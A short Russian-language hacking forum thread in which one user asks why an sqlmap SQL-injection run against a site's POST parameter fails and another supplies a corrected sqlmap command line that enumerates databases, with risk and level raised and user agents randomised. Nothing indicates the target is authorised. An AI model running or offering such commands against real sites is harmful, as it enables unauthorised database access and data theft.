Нужна помощь SQLMAP

Discussion in 'Песочница' started by qwerty1qwerty, 19 Jan 2020.

  1. qwerty1qwerty

    qwerty1qwerty New Member

    Joined:
    9 Jun 2018
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Сканер показал что в параметре random есть иньекция. Смотрю исходник где показал вроде как есть. Но Не работает map, и выдает странную ошибку.Впервые такое,гугл не помог. Что я не так делаю???



    [​IMG]





    -u https://site.com --data "code=94102&month=01&random=%5c&year=2015&_token=Amkrx5wyiyqwZKS0sJgkFKIqylbSCE61TpRgo8ME" -p "random" --method POST --risk=3 --random-agent
     
    #1 qwerty1qwerty, 19 Jan 2020
  2. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    438
    Likes Received:
    350
    Reputations:
    5
    --url "https://site.com" --data="code=94102&month=01&random=*&year=2015&_token=Amkrx5wyiyqwZKS0sJgkFKIqylbSCE61TpRgo8ME" --dbs --risk=3 --level=3 --dbms=mysql(или что там у тебя) --random-agent
    B сканерам верить такое себе, часто просто ложное срабатывание. Подозреваю что токен валидный нужен
     
    #2 karkajoi, 19 Jan 2020
    Last edited: 19 Jan 2020
(You must log in or sign up to post here.)